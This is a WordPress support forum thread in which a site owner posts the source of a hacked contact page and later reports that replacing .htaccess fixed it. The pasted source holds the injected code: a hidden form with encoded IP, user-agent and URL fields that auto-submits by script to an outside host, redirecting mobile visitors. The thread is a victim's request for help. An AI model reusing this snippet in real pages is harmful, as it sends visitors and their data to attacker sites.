WordPress hacked: Injected markup after

(@katsampukas)

Hey all,

Could someone help me on this: My wordpress (3.9 v) http:energiakoi.com have injected markup after closing head tag </head> at contact page (http://energiakoi.com/%CE%B5%CF%80%CE%B9%CE%BA%CE%BF%CE%B9%CE%BD%CF%89%CE%BD%CE%AF%CE%B1/), when viewing it on mobile devices (iphone).

I inspected the source code and it is the following:

<html version="HTML+RDFa 1.1" lang="el"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Επικοινωνία - ενεργειακος επιθεωρητης</title>
<meta name="generator" content="WordPress 121">
<meta name="robots" content="follow, all">
<link rel="stylesheet" href="http://energiakoi.com/wp-content/themes/ecobiz/style.css" type="text/css" media="screen">
<link rel="alternate" type="application/rss+xml" title="ενεργειακος επιθεωρητης RSS Feed" href="http://energiakoi.com/feed/">
<link href="https://plus.google.com/105411661693924388323" rel="publisher">
<link rel="pingback" href="http://energiakoi.com/xmlrpc.php">
<link rel="shortcut icon" href="http://energiakoi.com/wp-content/themes/ecobiz/images/favicon.ico">

<!-- This site is optimized with the Yoast WordPress SEO plugin v1.5.2.8 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://energiakoi.com/%ce%b5%cf%80%ce%b9%ce%ba%ce%bf%ce%b9%ce%bd%cf%89%ce%bd%ce%af%ce%b1/">
<link rel="publisher" href="https://plus.google.com/+Energiakoi/">
<meta property="og:locale" content="el_GR">
<meta property="og:type" content="article">
<meta property="og:title" content="Επικοινωνία - ενεργειακος επιθεωρητης">
<meta property="og:description" content="[schema type=&quot;organization&quot; orgtype=&quot;Corporation&quot; url=&quot;http://energiakoi.com&quot; name=&quot;Ενεργειακός Επιθεωρητής&quot; description=&quot;Ενεργειακός Επιθεωρητής, έκδοση Ενεργειακού πιστοποιητικού&quot; street=&quot;Γλάδστωνος 5, Αθήνα (στάση Μετρό Ομόνοια)&quot; city=&quot;Αθήνα&quot; country=&quot;GR&quot; email=&quot;info@climaline.gr&quot; phone=&quot;2103300352&quot; ]">
<meta property="og:url" content="http://energiakoi.com/%ce%b5%cf%80%ce%b9%ce%ba%ce%bf%ce%b9%ce%bd%cf%89%ce%bd%ce%af%ce%b1/">
<meta property="og:site_name" content="ενεργειακος επιθεωρητης">
<meta property="article:publisher" content="https://www.facebook.com/energiakapistopoiitika1">
<meta property="article:published_time" content="2011-07-09T16:00:45+00:00">
<meta property="article:modified_time" content="2012-11-14T00:07:20+00:00">
<meta property="og:updated_time" content="2012-11-14T00:07:20+00:00">
<meta property="og:image" content="http://energiakoi.com/wp-content/uploads/2011/07/green-house.jpg">
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@energiakoi">
<meta name="twitter:domain" content="ενεργειακος επιθεωρητης">
<meta name="twitter:creator" content="@energiakoi">
<!-- / Yoast WordPress SEO plugin. -->

<link rel="stylesheet" id="wp-customer-reviews-css" href="http://energiakoi.com/wp-content/plugins/wp-customer-reviews/wp-customer-reviews.css" type="text/css" media="all">
<script type="text/javascript" src="http://energiakoi.com/wp-includes/js/jquery/jquery.js"></script><style type="text/css"></style>
<script type="text/javascript" src="http://energiakoi.com/wp-includes/js/jquery/jquery-migrate.min.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/plugins/wp-customer-reviews/wp-customer-reviews.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/jquery.prettyPhoto.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/jqueryslidemenu.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/jquery.kwicks.min.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/jquery.tools.tabs.min.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/jquery.gmap.min.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/filterable.pack.js"></script>
<script type="text/javascript" src="http://energiakoi.com/wp-content/themes/ecobiz/js/functions.js"></script>
<script type="text/javascript">var ajaxurl = "http://energiakoi.com/wp-admin/admin-ajax.php"</script>	<link rel="stylesheet" href="http://energiakoi.com/wp-content/themes/ecobiz/css/prettyPhoto.css" type="text/css" media="screen">
	 <link rel="stylesheet" href="http://energiakoi.com/wp-content/themes/ecobiz/css/nivo-slider.css" type="text/css" media="screen">
   <link rel="stylesheet" href="http://energiakoi.com/wp-content/themes/ecobiz/css/kwicks.css" type="text/css" media="screen">

<!-- Javascript Start //-->
<!-- Javascript End //-->
<style type="text/css">
@import url("http://energiakoi.com/wp-content/themes/ecobiz/css/styles/dark.css");body {background-image: url(http://energiakoi.com/wp-content/themes/ecobiz/images/pattern/grid2.png); } body { font-family: "Trebuchet MS", Tahoma, sans-serif;}p { color:#666666;font-size:12px;font-style:}ol li { color:#666666}.arrowlist li { color:#666666}.checklist li { color:#666666}.bulletlist li { color:#666666}.itemlist li { color:#666666}.sidebarcontent h4 { color: Custom css code box;}</style>
<link type="text/css" rel="stylesheet" href="chrome-extension://clcbnchcgjcjphmnpndoelbdhakdlfkk/stylesheets/style.css"><script type="text/javascript" charset="utf-8" src="chrome-extension://clcbnchcgjcjphmnpndoelbdhakdlfkk/javascripts/page_context.js"></script></head>
<body quick-markup_injected="true"><body><form method="POST" action="http://paintingsbytompressly.com/830410590106a4b8fcabe8eccaf07dc8.php?q=9565e5edd4af68a99ccd229484917bfc" id="refoto_form" target="_top">
<input type="hidden" name="ip" value="7Q6vDIt/1nT3vjVTQA==">
<input type="hidden" name="ua" value="tlP7Vt89hmr0vjdAW8w1nSvwoTMgxAEAsPRU4p40Qhb4WeYCz96Q3hcr02UmNGlGA5evXT+sXeGuVztX4FcJjxZLN6FKdIaMZFKGex3fb4qIzU04Kk100AEQDRfpiRqCrAmQQj9bxFh478G/9fRaSLbqGdOzr91ffmyrs8dqjcj02JThkMP4WFmv4Jtyxhia">
<input type="hidden" name="furl" value="s0j1T4l+yCSl4ykNHMcsgSH/t3EuxB4Yv/BWpc4zQwvEeJAFod/9">
</form>
<script>
document.getElementById('refoto_form').submit();
</script></body></body></html>

I tested it in sucuri and it’s clean. Furthermore, i made a virus scan in my server (hosting24) and it’s clean too.

Can anyone help pls?

Viewing 1 replies (of 1 total)

Thread Starter katsampukas
(@katsampukas)

9 years, 11 months ago

Update:

I made a fresh copy of .htaccess and clear all cached files. It seems to load nice now.

Can anyone tell how is possible to inject html after head tag, and by-pass the predefined templating system? (head.php, index.php, page.php etc)

Viewing 1 replies (of 1 total)

The topic ‘WordPress hacked: Injected markup after’ is closed to new replies.

WordPress hacked: Injected markup after

Tags

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics